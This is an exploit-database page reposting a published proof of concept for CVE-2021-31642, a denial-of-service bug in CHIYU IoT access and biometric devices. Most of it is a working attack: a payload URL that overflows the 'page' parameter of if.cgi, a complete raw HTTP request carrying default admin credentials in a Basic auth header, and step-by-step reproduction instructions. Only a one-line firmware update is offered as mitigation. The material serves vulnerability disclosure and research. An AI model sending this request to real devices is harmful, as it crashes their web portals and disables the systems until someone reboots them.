Advertisement






CHIYU IoT Denial Of Service

CVE Category Price Severity
CVE-2021-31642 CWE-400 N/A High
Author Risk Exploitation Type Date
Unknown High Remote 2021-06-06
CPE
cpe:cpe:/a:chiyu:iot_device
Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2021060032

Below is a copy:

CHIYU IoT Denial Of Service
# Exploit Title: CHIYU IoT Devices - Denial of Service (DoS)
# Date: 01/06/2021
# Exploit Author: sirpedrotavares
# Vendor Homepage: https://www.chiyu-tech.com/msg/msg88.html
# Software Link: https://www.chiyu-tech.com/category-hardware.html
# Version: BIOSENSE, Webpass, and BF-630, BF-631, and SEMAC   - all firmware versions < June 2021
# Tested on: BIOSENSE, Webpass, and BF-630, BF-631, and SEMAC
# CVE: CVE-2021-31642
# Publication: https://seguranca-informatica.pt/dancing-in-the-iot-chiyu-devices-vulnerable-to-remote-attacks

Description: A denial of service condition exists after an integer overflow in several IoT devices from CHIYU Technology, including BIOSENSE, Webpass, and BF-630, BF-631, and SEMAC. The vulnerability can be explored by sending an unexpected integer (> 32 bits) on the page parameter that will crash the web portal and making it unavailable until a reboot of the device.
CVE ID: CVE-2021-31642
CVSS: Medium- CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H
URL: https://gitbook.seguranca-informatica.pt/cve-and-exploits/cves/chiyu-iot-devices#cve-2021-31642

Affected parameter: page=Component: if.cgi
Payload:
if.cgi?redirect=AccLog.htm&failure=fail.htm&type=go_log_page&page=2781000

====HTTP request======
GET
/if.cgi?redirect=AccLog.htm&failure=fail.htm&type=go_log_page&page=2781000
HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:87.0)
Gecko/20100101 Firefox/87.0
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: pt-PT,pt;q=0.8,en;q=0.5,en-US;q=0.3
Accept-Encoding: gzip, deflate
Authorization: Basic YWRtaW46YWRtaW4=
Connection: close
Referer: http://127.0.0.1/AccLog.htm
Cookie: fresh=
Upgrade-Insecure-Requests: 1



Steps to reproduce:
  1. Navigate to the vulnerable device
  2. Make a GET request to the CGI component (if.cgi)
  3. Append the payload at the end of the vulnerable parameter (page)
  4. Submit the request and observe payload execution


 Mitigation: The latest version of the CHIYU firmware should be installed
to mitigate this vulnerability.

Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum